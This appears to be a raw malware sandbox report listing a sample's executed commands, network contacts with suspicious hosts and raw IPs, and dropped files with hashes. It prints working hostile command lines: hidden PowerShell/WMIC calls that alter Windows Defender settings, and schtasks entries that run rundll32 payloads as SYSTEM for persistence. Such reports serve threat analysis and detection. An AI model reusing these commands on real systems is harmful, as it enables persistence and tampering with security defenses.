C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\AvKHovV.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 12:41:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll\",#1 /LHsite_idkmI 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | skategirls.org | udp |
| US | 8.8.8.8:53 | grabify.link | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| RU | 77.221.151.32:80 | 77.221.151.32 | tcp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 104.26.8.202:443 | grabify.link | tcp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.151.221.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.90.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.31.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 8.8.8.8:53 | 10.66.42.5.in-addr.arpa | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| US | 8.8.8.8:53 | 106.76.97.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.249.30.184.in-addr.arpa | udp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.15:443 | features.opera-api2.com | tcp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 132.250.30.184.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 2.16.27.215:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 215.27.16.2.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | b3d3dca1-28bb-4ffd-828a-80ac85234ad8.uuid.alldatadump.org | udp |
| US | 8.8.8.8:53 | 45.87.157.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.248:443 | download.iolo.net | tcp |
| US | 8.8.8.8:53 | 248.2.93.185.in-addr.arpa | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server8.alldatadump.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| NL | 74.125.128.127:19302 | stun2.l.google.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.108:443 | server8.alldatadump.org | tcp |
| US | 8.8.8.8:53 | 127.128.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 82.94.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | 148.155.9.20.in-addr.arpa | udp |
| BG | 185.82.216.108:443 | server8.alldatadump.org | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server8.alldatadump.org | udp |
| BG | 185.82.216.108:443 | server8.alldatadump.org | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | api5.check-data.xyz | udp |
| US | 44.239.127.146:80 | api5.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 146.127.239.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
memory/2156-0-0x000001FD7AF80000-0x000001FD7AFB6000-memory.dmp
memory/2156-1-0x00007FF84CA60000-0x00007FF84D521000-memory.dmp
memory/2156-2-0x000001FD7D600000-0x000001FD7D610000-memory.dmp
memory/2156-3-0x000001FD7B360000-0x000001FD7B3BE000-memory.dmp
memory/2468-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2468-5-0x0000000074A20000-0x00000000751D0000-memory.dmp
memory/2468-6-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/2156-7-0x00007FF84CA60000-0x00007FF84D521000-memory.dmp
C:\Users\Admin\Pictures\l6LSdyUHXm4SFBWhR2naUyoe.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
| MD5 | 91a5c37b8ffaf4337e6a180b53cb3bc9 |
| SHA1 | f26e6a9a0469259358bf11d7520d97b1a1217d0d |
| SHA256 | 0a8a918a87480164a28ff60fb51ca3fc54afdf9ebce43343a8f2c05c2431ce46 |
| SHA512 | 6d968aca48c66fd2207308aeeb5dfd3e9eec4a523a8fa31259352eee359018772b41095b87453bea548b45c3f35fc22a2855ab11a1269705839fde3c8439c294 |
memory/768-30-0x0000000001CA0000-0x0000000001DA0000-memory.dmp
memory/768-31-0x0000000001BB0000-0x0000000001C22000-memory.dmp
memory/768-32-0x0000000000400000-0x0000000001A40000-memory.dmp
C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
| MD5 | 749cb9cb3ce89a03fdd97a9aaf96e895 |
| SHA1 | 73ecd478ace66e1dfb7aeed8ed061af48214a46f |
| SHA256 | 85aeb0eca144912f0713ac4e8392e2645a91bb4ba8e2ffa55e5bf834665170af |
| SHA512 | ac0afac898ab53a3277b4d1aef90af246ca8596872a6a61bbf47817c1ea038fc4394094a4d14d2cc0aa94aeaf1435f9ccc7cf7143010ff581fd4256dc653bd31 |
memory/4592-43-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4592-44-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4592-45-0x00007FF800000000-0x00007FF800002000-memory.dmp
memory/4592-46-0x00007FF86AAD0000-0x00007FF86ACC5000-memory.dmp
memory/4592-48-0x00007FF86A020000-0x00007FF86A0DE000-memory.dmp
memory/4592-51-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4592-50-0x00007FF800030000-0x00007FF800031000-memory.dmp
memory/4592-49-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4592-47-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4592-52-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4592-53-0x0000000140000000-0x00000001408B7000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
| MD5 | 7ea234dfc011f40047e769b15ebe661b |
| SHA1 | 5a779733891b290d45b3009eb4ceb17c41a2401d |
| SHA256 | c7c0f3e7c270835c0af43a4103d9ef95f85f3ce48d7ab7863d1d3a2fae1847c8 |
| SHA512 | 71f90fcd6f1c72ab8e9498ff811982db7dd0aa28bb384e8642b3dd75db7b699d853725930eba629e7fa27449bd876a70c8be2619ebc09f514ae06cde714bc9fd |
memory/1756-72-0x0000000003A80000-0x0000000003E87000-memory.dmp
memory/1756-73-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1756-74-0x0000000003E90000-0x000000000477B000-memory.dmp
memory/2164-86-0x0000000003A00000-0x0000000003E06000-memory.dmp
memory/3936-87-0x0000000004E80000-0x0000000004EB6000-memory.dmp
memory/3936-88-0x0000000005640000-0x0000000005C68000-memory.dmp
memory/2164-89-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3936-90-0x0000000005000000-0x0000000005010000-memory.dmp
memory/2468-92-0x0000000074A20000-0x00000000751D0000-memory.dmp
memory/3936-91-0x0000000005CB0000-0x0000000005CD2000-memory.dmp
memory/3936-93-0x0000000074A20000-0x00000000751D0000-memory.dmp
memory/3936-94-0x0000000005000000-0x0000000005010000-memory.dmp
memory/3936-95-0x0000000005D50000-0x0000000005DB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnuisomx.nia.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3936-101-0x0000000005E30000-0x0000000005E96000-memory.dmp
memory/2468-106-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/3936-107-0x0000000005FA0000-0x00000000062F4000-memory.dmp
memory/768-109-0x0000000000400000-0x0000000001A40000-memory.dmp
memory/4936-110-0x0000000074A20000-0x00000000751D0000-memory.dmp
memory/4936-111-0x0000000004B50000-0x0000000004B60000-memory.dmp
memory/768-112-0x0000000001CA0000-0x0000000001DA0000-memory.dmp
memory/3936-114-0x0000000006460000-0x000000000647E000-memory.dmp
memory/4936-113-0x0000000004B50000-0x0000000004B60000-memory.dmp
memory/3936-115-0x00000000069D0000-0x0000000006A1C000-memory.dmp
memory/4592-116-0x0000000140000000-0x00000001408B7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ulc.0.exe
| MD5 | 513e1df3bd8755c988baf3f682d3abc0 |
| SHA1 | 909fa3f20c167213d94c6edc50bb43672d8cb41e |
| SHA256 | 9f8af4317529d2b35ddafa1b74a2379695cf0c68ef2639141fe0e875692b9e9d |
| SHA512 | c838f5520bbd320c53a7daa536eef16cc819abf509b973d570e93a7906c5dafa569e07a81c11b73637daf8ff8e03aa508ef0825f3e5a36c8d98b3764cadb4ba4 |
memory/4592-134-0x00007FF86AAD0000-0x00007FF86ACC5000-memory.dmp
memory/1572-136-0x0000000003650000-0x0000000003677000-memory.dmp
memory/1572-135-0x0000000001A70000-0x0000000001B70000-memory.dmp
memory/1572-137-0x0000000000400000-0x0000000001A19000-memory.dmp
memory/3936-138-0x0000000006920000-0x0000000006964000-memory.dmp
memory/3936-139-0x0000000007780000-0x00000000077F6000-memory.dmp
memory/3936-140-0x0000000007E80000-0x00000000084FA000-memory.dmp
memory/3936-141-0x0000000007820000-0x000000000783A000-memory.dmp
memory/3936-142-0x00000000079E0000-0x0000000007A12000-memory.dmp
memory/1756-144-0x0000000003A80000-0x0000000003E87000-memory.dmp
memory/3936-145-0x000000006F700000-0x000000006FA54000-memory.dmp
memory/3936-155-0x0000000007A20000-0x0000000007A3E000-memory.dmp
memory/3936-156-0x0000000007A40000-0x0000000007AE3000-memory.dmp
memory/3936-158-0x000000007F990000-0x000000007F9A0000-memory.dmp
memory/1756-157-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3936-143-0x000000006FF80000-0x000000006FFCC000-memory.dmp
memory/3936-159-0x0000000005000000-0x0000000005010000-memory.dmp
memory/3936-160-0x0000000007B30000-0x0000000007B3A000-memory.dmp
memory/1572-161-0x0000000000400000-0x0000000001A19000-memory.dmp
memory/3936-162-0x0000000007BF0000-0x0000000007C86000-memory.dmp
memory/3936-163-0x0000000007B50000-0x0000000007B61000-memory.dmp
memory/4936-166-0x000000007F190000-0x000000007F1A0000-memory.dmp
memory/4936-167-0x000000006FF80000-0x000000006FFCC000-memory.dmp
memory/4936-168-0x000000006F700000-0x000000006FA54000-memory.dmp
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
| MD5 | fb2fa33d9a08da7e95b553ff8487e328 |
| SHA1 | 5f0329ccc8dfed784353ec12fac5efc80384c1ee |
| SHA256 | d8d7763ece24d6ffb9544171f5af36f3fc3bca7fba3f872752adf0dce521b661 |
| SHA512 | 6be950c2ca60153eb33357ceadf8fbf2cf9019bf7103d050cc772b3403f486d268d7e079df21ef8333c5bf7753bf5c7ec42ca04bae09e47c76d955cac29478d9 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404191404507553208.dll
| MD5 | 0415cb7be0361a74a039d5f31e72fa65 |
| SHA1 | 46ae154436c8c059ee75cbc6a18ccda96bb2021d |
| SHA256 | bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798 |
| SHA512 | f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | d95bb2433432984a05ff6febc5952649 |
| SHA1 | c34d05f432a6d998f946896ae41bcef758b1398d |
| SHA256 | aba97c4dab0eecba7b5d330995c60f4ea4268c2edb63201b30ffbb453ba2ce87 |
| SHA512 | 62af186de5e31aea06e990adac6e836ded9d279bd01018ef9f4eaea751c29ef6c844a43114df35e2ef8a383c7dae973ba99b09eabd6df213842cbfcbcbca5e4b |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 1de04f96914b420ce2fced5336765d97 |
| SHA1 | c60bd7f83cad273e1d98aecaba41e39457778482 |
| SHA256 | 496f940ab9a8c051bb48f7779e20da440e698c03a50fe9f7753d4249d59752b8 |
| SHA512 | bec1c056bae68423b50dddbf622ed1f84f0150a7da867ce91320066d4be1ab47d6402e367f352fa17eba24616ad9ceaf6fe78481cf254c062b8b5a594e487527 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | a6ea7bfcd3aac150c0caef765cb52281 |
| SHA1 | 037dc22c46a0eb0b9ad4c74088129e387cffe96b |
| SHA256 | f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9 |
| SHA512 | c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23 |
memory/768-242-0x0000000000400000-0x0000000001A40000-memory.dmp
memory/1756-251-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/2164-295-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/4364-296-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/4804-297-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\opera_package
| MD5 | 5014156e9ffbb75d1a8d5fc09fabdc42 |
| SHA1 | 6968d1b5cec3039e53bbbedeee22e2d43d94c771 |
| SHA256 | 7a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802 |
| SHA512 | bfc5c44881d0fa7bcbccfd530d874fa624adec50e1a16063a72de12876d2db10ca5edd6fa841ea63e9deca3ff2adf54065f50719fe051d41de92bb68edba4016 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | f389cb4db9d1eba54d7892fb5467be38 |
| SHA1 | ac8a660e5a758462069f8b08504ef4cf25802000 |
| SHA256 | 4f03fe3f5b727ec12bf8a2beb1ddf00bfc6cbd3bcca6f49510f4fad5734bb939 |
| SHA512 | 989c3ae4ae4f7c5d207cc1cdd2c16983e37eb9600f222c5367dad7607c4a1186c7b69d74ca55fe8e8c0137a1f73ef6bf0138cfd946122df9fb1388ba633efdb0 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 6cfd1c02ada13c47a6c0e4384016798f |
| SHA1 | 66d60265c0d3d2db38c9cad2357915c3d6078889 |
| SHA256 | c3803e966366657282f4008f1700fe2cac66402c84b5e10e7d703e29c8a182f0 |
| SHA512 | 098f50dc8bd17fc9de3123df2ba2b7318b6bf7a1e9b01794cd7990530ce67909d0e3eac0ee9d283ef88ebb104578478f5905c5c76ee9168765690356a722e400 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
| MD5 | 15d8c8f36cef095a67d156969ecdb896 |
| SHA1 | a1435deb5866cd341c09e56b65cdda33620fcc95 |
| SHA256 | 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8 |
| SHA512 | d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
| MD5 | 976bc8e5fe65f9bb56831e20f1747150 |
| SHA1 | f9e7f5628aaaabed9939ef055540e24590a9ccfb |
| SHA256 | f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0 |
| SHA512 | 2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\dbgcore.dll
| MD5 | 9ebb919b96f6f94e1be4cdc6913ef629 |
| SHA1 | 31e99ac4fba516f82b36bd81784e8d518b32f9df |
| SHA256 | fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119 |
| SHA512 | a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\dbghelp.dll
| MD5 | 544255258f9d45b4608ccfd27a4ed1dd |
| SHA1 | 571e30ceb9c977817b5bbac306366ae59f773497 |
| SHA256 | 3b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68 |
| SHA512 | 2093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664 |
memory/4804-507-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/4364-511-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | cd959341129ee16e6ba3e3e9509aa1cc |
| SHA1 | 233784d46d17530a7a3bb6b851923e97d3ee0980 |
| SHA256 | 601262fd2f916223f6993b69f9f3625f03d8e7e8e6c9a3b0ea4bd31cbd5c70fc |
| SHA512 | 5cf39fe719011762408990cd9c50fc02b25998aeeb9c72e5f272c6952f0cf4559be6129f6accab1868124a05777ba726df3f33cac450d520d06a7d95e85c581b |
memory/4364-518-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ulc.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/768-563-0x0000000000400000-0x0000000001A40000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | bd77d3f5f5f5b6d6a9f831a75e674fdd |
| SHA1 | 9e0d39064f4ebf0755ae05bb41b6c098d7ed8566 |
